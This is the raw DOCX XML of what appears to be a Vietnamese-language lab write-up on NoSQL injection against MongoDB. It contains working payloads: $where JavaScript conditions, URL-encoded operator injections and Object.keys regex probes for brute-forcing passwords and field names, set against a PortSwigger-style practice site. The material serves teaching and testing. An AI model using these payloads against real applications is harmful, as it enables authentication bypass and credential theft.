    <w:p w14:paraId="220342DC" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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 xml:space="preserve">  "$where": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 'admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password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.match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(/\\d/) || 'a'=='b'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228C637" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21491316" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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C7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password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.match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(/\d/) →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password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(\d).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6DE413" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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true, document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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D35F68" w14:textId="77777777" w:rsidR="00D26BA1" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1" w:rsidP="00D26BA1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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42393E" w14:textId="139AED72" w:rsidR="00AF259A" w:rsidRPr="00BC7C15" w:rsidRDefault="00D26BA1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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2664EA" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49C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A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xác</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A49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7A49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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A49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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37FA212D" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49C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A49CF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MongoDB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sưu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JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D78FB8" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49C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A49CF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MongoDB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passwordtrường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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B14D8E" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://insecure-website.com/user/lookup?username=admin'+%26%26+this.password!%3d'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8ED8B" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49C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A49CF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payload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. Trong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usernametồn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payload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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BDC6BC" w14:textId="77777777" w:rsidR="007A49CF" w:rsidRPr="007A49CF" w:rsidRDefault="007A49CF" w:rsidP="007A49CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">!=' admin' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.foo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>!=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED25156" w14:textId="63DFEBF4" w:rsidR="007A49CF" w:rsidRPr="00BC7C15" w:rsidRDefault="007A49C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A49CF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passwordtrường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đợi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hệt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A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>( username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A49CF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9CF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7A49C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A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>( foo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A49CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6559201C" w14:textId="1D19C88F" w:rsidR="00A65DEB" w:rsidRPr="00BC7C15" w:rsidRDefault="00A65DEB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12FC6A8" wp14:editId="4C0C4D8E">
            <wp:extent cx="5943600" cy="2978150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134430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044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0621" w14:textId="6B5F2E5F" w:rsidR="00A65DEB" w:rsidRPr="00BC7C15" w:rsidRDefault="00A65DEB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 xml:space="preserve">Khi ta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 xml:space="preserve">‘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vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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administrator,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hiện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63612B54" w14:textId="48700139" w:rsidR="00A65DEB" w:rsidRPr="00BC7C15" w:rsidRDefault="00A65DEB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EBC632" wp14:editId="18F391B5">
            <wp:extent cx="5943600" cy="3122295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="26726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683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FA7D" w14:textId="48E57683" w:rsidR="00A65DEB" w:rsidRPr="00BC7C15" w:rsidRDefault="00A65DE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‘&amp;&amp;1==’1</w:t>
      </w:r>
      <w:r w:rsidR="00015A42"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5A42" w:rsidRPr="00BC7C1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015A42" w:rsidRPr="00BC7C15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="00015A42" w:rsidRPr="00BC7C1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015A42"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5A42" w:rsidRPr="00BC7C1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015A42" w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00015A42" w:rsidRPr="00BC7C15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="00015A42"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5A42" w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tỏ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00015A42"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5A42"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15A42"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5A42" w:rsidRPr="00BC7C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015A42"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5A42" w:rsidRPr="00BC7C15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="00015A42"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5A42" w:rsidRPr="00BC7C15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="00015A42" w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> NoSQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71074B0B" w14:textId="3243D8B8" w:rsidR="000D3435" w:rsidRPr="00BC7C15" w:rsidRDefault="004E43F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lastRenderedPageBreak/>
        <w:t>Nếu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passwd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r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">' &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>this.password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15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0]=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='a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ở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sang intruder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dò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pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7C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197EA5" wp14:editId="27BB22DD">
            <wp:extent cx="5943600" cy="3286125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="785766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664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9A75" w14:textId="26777995" w:rsidR="00AF259A" w:rsidRPr="00BC7C15" w:rsidRDefault="004E43F3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802285" wp14:editId="07DAA2E8">
            <wp:extent cx="5943600" cy="3649345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="112564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428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CE5B" w14:textId="77777777" w:rsidR="00656453" w:rsidRPr="00BC7C15" w:rsidRDefault="00656453">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FBB2F9" w14:textId="43707674" w:rsidR="00656453" w:rsidRPr="00BC7C15" w:rsidRDefault="004E43F3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7D1FE6" wp14:editId="4769FBFC">
            <wp:extent cx="5943600" cy="4612640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3176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51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5DAE" w14:textId="77777777" w:rsidR="00656453" w:rsidRPr="00BC7C15" w:rsidRDefault="00656453">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC0C659" w14:textId="05433FFD" w:rsidR="00656453" w:rsidRPr="00BC7C15" w:rsidRDefault="004E43F3" w:rsidP="0065645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 xml:space="preserve">respond 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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC7C15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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DC352" w14:textId="1A787DEB" w:rsidR="004E43F3" w:rsidRPr="00BC7C15" w:rsidRDefault="004E43F3" w:rsidP="00656453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B8370FF" wp14:editId="61659B81">
            <wp:extent cx="5943600" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="286926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268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C7E0" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="0034656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46567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chèn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003465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3465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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003465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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00346567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF9F83" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="0034656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46567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chấp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dung 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POSTyêu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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5734D7" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="00346567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00346567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"wiener","password":"peter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>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2892E430" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="0034656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4656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chèn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> $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wheretoán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sung,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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2648D53D" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="00346567">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00346567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"wiener","password":"peter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>", "$where":"0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00346567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"}{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00346567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username":"wiener","password":"peter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>", "$where":"1"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532949CB" w14:textId="77777777" w:rsidR="00346567" w:rsidRPr="00346567" w:rsidRDefault="00346567" w:rsidP="0034656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4656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JavaScript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> $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wheremệnh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56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346567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C5E05" w14:textId="77777777" w:rsidR="00AA766C" w:rsidRPr="00AA766C" w:rsidRDefault="00AA766C" w:rsidP="00AA766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A766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chèn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA76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AA76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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA76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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2FC905" w14:textId="77777777" w:rsidR="00AA766C" w:rsidRPr="00AA766C" w:rsidRDefault="00AA766C" w:rsidP="00AA766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A766C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chấp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dung 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POSTyêu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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FB189" w14:textId="77777777" w:rsidR="00AA766C" w:rsidRPr="00AA766C" w:rsidRDefault="00AA766C" w:rsidP="00AA766C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"wiener","password":"peter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>"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118AC431" w14:textId="762CF3B5" w:rsidR="00AA766C" w:rsidRPr="00AA766C" w:rsidRDefault="00AA766C" w:rsidP="00AA766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A766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Để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chèn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> $where</w:t>
      </w:r>
      <w:r w:rsidR="00CF2A0A"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sung,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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA0A5C" w14:textId="77777777" w:rsidR="00341EDB" w:rsidRPr="00BC7C15" w:rsidRDefault="00AA766C" w:rsidP="00AA766C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"wiener","password":"peter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>", "$where":"0"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395431A" w14:textId="7E4BF384" w:rsidR="00AA766C" w:rsidRPr="00AA766C" w:rsidRDefault="00AA766C" w:rsidP="00AA766C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{"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username":"wiener","password":"peter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>", "$where":"1"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15688CE8" w14:textId="5B7A1964" w:rsidR="00346567" w:rsidRPr="00BC7C15" w:rsidRDefault="00AA766C" w:rsidP="0065645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A766C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JavaScript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> $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wheremệnh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66C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A766C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E88DA1C" w14:textId="77777777" w:rsidR="00CF2A0A" w:rsidRPr="00CF2A0A" w:rsidRDefault="00CF2A0A" w:rsidP="00CF2A0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F2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trích</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF2A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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xuất</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF2A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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF2A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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73243192" w14:textId="77777777" w:rsidR="00CF2A0A" w:rsidRPr="00CF2A0A" w:rsidRDefault="00CF2A0A" w:rsidP="00CF2A0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F2A0A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chèn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JavaScript,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> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keys(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8EA03B" w14:textId="77777777" w:rsidR="00CF2A0A" w:rsidRPr="00CF2A0A" w:rsidRDefault="00CF2A0A" w:rsidP="00CF2A0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"$where":"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Object.keys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>(this)[0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>].match</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('^.{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0}a.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A5CA61" w14:textId="77777777" w:rsidR="00CF2A0A" w:rsidRPr="00CF2A0A" w:rsidRDefault="00CF2A0A" w:rsidP="00CF2A0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Thao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. Thao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A0A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CF2A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC65ABA" w14:textId="77777777" w:rsidR="00897E6F" w:rsidRPr="00897E6F" w:rsidRDefault="00897E6F" w:rsidP="00897E6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97E6F">
        <w:rPr>
